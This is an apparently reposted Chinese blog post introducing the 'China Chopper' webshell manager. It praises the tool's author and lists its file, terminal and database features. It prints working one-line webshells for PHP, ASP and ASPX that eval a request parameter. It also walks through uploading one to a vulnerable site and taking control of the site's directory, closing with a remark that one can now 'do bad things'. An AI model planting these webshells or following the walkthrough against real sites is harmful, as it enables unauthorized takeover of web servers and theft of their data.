十大黑客工具之一——中国菜刀

Posted longronglang

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了十大黑客工具之一——中国菜刀相关的知识,希望对你有一定的参考价值。

中国菜刀的由来:

说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/php/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。

技术图片

 

作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。

技术图片

 

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。

技术图片

 

主要功能有:文件管理,虚拟终端,数据库管理。

1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;

2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)

3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS

以入支持ADO方式连接的数据库。

只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。

技术图片

 

什么是一句话木马?

一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下:

php:<?php @eval($_post[‘pass‘]);?>

asp:<%eval request ("pass")%>

aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

 

一句话木马的使用

以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。

技术图片

假设有个智障网站有这样的漏洞:

技术图片

 

我们把这个phpma.php上传上去后,打开中国菜刀,在空白处鼠标右键,选择“添加选项”

技术图片

 

编辑相关参数,包括一句话木马所在的URL以及密码,最后点击“编辑” 。

技术图片

 

在URL中选中目标网站,点击鼠标右键,选择“文件管理”,就能看到网站的目录结构了 。

技术图片

 

获取整个网站的目录,然后就可以开始做坏事了。

技术图片

以上是关于十大黑客工具之一——中国菜刀的主要内容,如果未能解决你的问题,请参考以下文章

Web Shell- 技术剖析中国菜刀 – Part I

中国菜刀之检查是否含有shell

中国菜刀的作用详细介绍和使用说明(黑站神器与侧门运用检测工具)

webshell管理工具及其流量特征分析

Windows2008系统漏洞提权复现

[转帖]xise菜刀下载,集中国菜刀为一体的xise工具